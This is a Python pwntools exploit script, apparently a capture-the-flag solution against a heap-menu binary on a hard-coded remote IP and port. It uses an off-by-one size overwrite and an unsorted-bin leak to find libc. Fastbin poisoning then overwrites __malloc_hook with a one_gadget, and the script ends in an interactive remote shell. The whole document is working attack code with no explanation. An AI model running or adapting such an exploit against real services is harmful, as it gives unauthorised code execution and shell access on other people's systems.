1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95
| from pwn import * context.log_level='debug'
r = remote("121.36.194.21", 49153)
def New(index, size): r.sendlineafter("Your choice:", '1') r.sendlineafter("Index:", str(index)) r.sendlineafter("Size:", str(size))
def Edit(index, content): r.sendlineafter("Your choice:", '2') r.sendlineafter("Index:", str(index)) r.sendafter("Content:", content)
def Print(index): r.sendlineafter("Your choice:", '3') r.sendlineafter("Index:", str(index)) r.recvuntil("Content: ") return r.recvuntil("1. New")[:-7]
def Remove(index): r.sendlineafter("Your choice:", '4') r.sendlineafter("Index:", str(index))
New(10, 0xd8) New(11, 0xd8) New(12, 0xd8) New(13, 0xd8) New(14, 0xd8) New(15, 0xd8) New(16, 0xd8) Remove(10) Remove(11) Remove(12) Remove(13) Remove(14) Remove(15) Remove(16)
New(0, 0x68) New(1, 0x68) New(2, 0x68) New(3, 0x68) New(4, 0x68)
Edit(0, 'a'*0x68+p8(0xe1)) Remove(1) New(1, 0x68) unsorted_bin = u64(Print(2).ljust(8, '\x00'))-8 log.success("unsorted bin => {}".format(hex(unsorted_bin))) log.success("__malloc_hook addr => {}".format(hex(unsorted_bin-88-0x10))) main_arena = unsorted_bin - 88 malloc_hook = main_arena - 0x10 hack = malloc_hook - 0x23
from SearchLibc import * libc = SearchLibc("__malloc_hook", malloc_hook) base = malloc_hook - libc.dump([ '__malloc_hook' ]) ogg = libc.ogg() + base
log.success("hack addr => {}".format(hex(hack))) log.success("one_gadget addr => {}".format(hex(ogg)))
New(5, 0x68) Remove(2) Edit(5, p64(hack)+'\n')
New(8, 0x68) New(9, 0x68) Edit(9, 'a'*0x23+p64(ogg)+'\n')
New(17, 0x30)
r.interactive()
|